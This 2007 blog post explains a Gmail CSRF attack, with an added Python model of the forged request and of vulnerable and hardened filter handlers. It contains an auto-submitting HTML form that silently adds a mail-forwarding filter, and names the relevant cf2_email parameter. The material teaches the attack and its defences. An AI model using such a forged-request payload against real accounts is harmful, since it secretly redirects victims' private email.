Poor man's view of the world

As of 27th September 2007 – yes!

A malicious hacker can misuse Cross-site request forgery (CSRF) to redirect a copy of all your incoming emails to his account! CSRF is also referred to as "one click attack" or "session riding".

[Before you read any further please understand gmail filters by logging into your gmail account and going to Settings – Filters.]

CSRF is an attack in which a victim's browser is made to send requests the victim never intended to a site on which the victim is already authenticated; the site cannot tell the forged request from a genuine one. Let's take a simple example to understand this:

  1. Pooja is checking her email on a very safe computer (fully patched, firewalled, with the latest antivirus updates, etc.) using a very safe browser.
  2. Because she is logged in to Gmail, her browser holds the Gmail session cookie and will attach it to every request it sends to Gmail, whichever page caused the request.
  3. She receives an email from Priyanka containing a really funny joke. The email contains a link to a site which promises lots more funny stuff. She clicks on the link and is very happy with the site that opens up.
  4. What she does not realize is that this joke site has forged a POST request to the Gmail "Create Filter" wizard. This creates a filter that forwards a copy of every email arriving in Pooja's account to Priyanka!
  5. Gmail accepts the request to create the filter because the genuine account holder (Pooja) is authenticated and logged in at that moment, and her session cookie is sent along with the forged request.
  6. This new Gmail filter will keep stealing Pooja's emails until she manually checks her filters and notices the unauthorized one.
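The scenario above, modelled as an added example (this is not code from the original post or from Gmail). The attacker page is a constructed auto-submitting form; the `SID` cookie name, the `/create_filter` path and the `csrf_token` field are assumptions made for the model, and only the `cf2_email` field comes from the post. The vulnerable handler accepts a filter on the strength of the cookie alone, exactly as step 5 describes; the hardened handler adds an origin check and a per-session secret that a cross-origin page cannot read.

```python
# Added example modelling the Gmail filter CSRF; not the original post's code.
# Assumptions: "SID" cookie, /create_filter path, "csrf_token" field. Only
# cf2_email is taken from the post.
import hmac
import secrets
from dataclasses import dataclass, field


@dataclass
class Request:
    """What the server sees: cookies the browser attached, form fields, headers."""
    cookies: dict
    params: dict
    headers: dict = field(default_factory=dict)


@dataclass
class Mailbox:
    owner: str
    forward_to: list = field(default_factory=list)
    # Per-session secret embedded in Gmail's own pages; a page on another
    # origin cannot read it, so it cannot be copied into a forged form.
    csrf_token: str = field(default_factory=lambda: secrets.token_hex(16))


SESSIONS: dict = {}  # session cookie value -> Mailbox


def login(owner: str) -> str:
    """Pooja logs in; her browser now holds the SID cookie for Gmail."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = Mailbox(owner)
    return sid


# Constructed attacker page (the "funny joke" site). The hidden form targets
# Gmail and submits itself on load; the browser attaches Pooja's cookie itself.
JOKE_SITE_HTML = """<html><body onload="document.forms[0].submit()">
<form method="POST" action="https://mail.google.com/mail/create_filter">
  <input type="hidden" name="cf2_email" value="priyanka@example.com">
</form></body></html>"""


def forged_request(victim_cookie: str) -> Request:
    """The request the browser sends when JOKE_SITE_HTML loads (step 4)."""
    return Request(
        cookies={"SID": victim_cookie},          # attached by the browser, not the attacker
        params={"cf2_email": "priyanka@example.com"},
        headers={"Origin": "http://funny-jokes.example"},
    )


def create_filter_vulnerable(req: Request) -> int:
    """Trusts the session cookie alone, which is exactly what CSRF exploits."""
    box = SESSIONS.get(req.cookies.get("SID"))
    if box is None:
        return 401
    box.forward_to.append(req.params["cf2_email"])
    return 200


def create_filter_hardened(req: Request) -> int:
    """Same endpoint with two independent checks a forged request cannot pass."""
    box = SESSIONS.get(req.cookies.get("SID"))
    if box is None:
        return 401
    origin = req.headers.get("Origin") or req.headers.get("Referer", "")
    if not origin.startswith("https://mail.google.com"):
        return 403  # the request did not come from Gmail's own pages
    token = req.params.get("csrf_token", "")
    if not hmac.compare_digest(token, box.csrf_token):
        return 403  # the attacker cannot read the token cross-origin
    box.forward_to.append(req.params["cf2_email"])
    return 200


def legitimate_request(sid: str, email: str) -> Request:
    """Gmail's own filter wizard carries the token and comes from its origin."""
    return Request(
        cookies={"SID": sid},
        params={"cf2_email": email, "csrf_token": SESSIONS[sid].csrf_token},
        headers={"Origin": "https://mail.google.com"},
    )


def demo() -> dict:
    """Run the forged request against both handlers and a genuine one against the hardened one."""
    sid = login("pooja")
    results = {"vulnerable": create_filter_vulnerable(forged_request(sid)),
               "forwards_after_vulnerable": list(SESSIONS[sid].forward_to)}
    sid2 = login("pooja")
    results["hardened_forged"] = create_filter_hardened(forged_request(sid2))
    results["hardened_legit"] = create_filter_hardened(
        legitimate_request(sid2, "pooja-backup@example.com"))
    results["forwards_after_hardened"] = list(SESSIONS[sid2].forward_to)
    return results


if __name__ == "__main__":
    print(demo())
```

Two points the model makes visible: the attacker never touches the cookie, the browser supplies it, so checking "is the user logged in" proves nothing about who built the request; and the token check works only because the secret lives in a page the attacker's origin cannot read. In 2007 the practical choice was a Referer check plus a token; the `Origin` header used here came later, and browsers sometimes strip Referer, so the token is the check to rely on.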

I carried out a small experiment wherein I requested a filter to forward all emails to a particular account. On analyzing the data transfer between my browser and gmail (using the Tamper Data extension for Firefox) I found that the relevant GET parameter is cf2_email.

See the following for more information on this -

Many thanks to Giorgio Maone for his post on this issue. As Giorgio says, this exploit is "Very clever and very dangerous."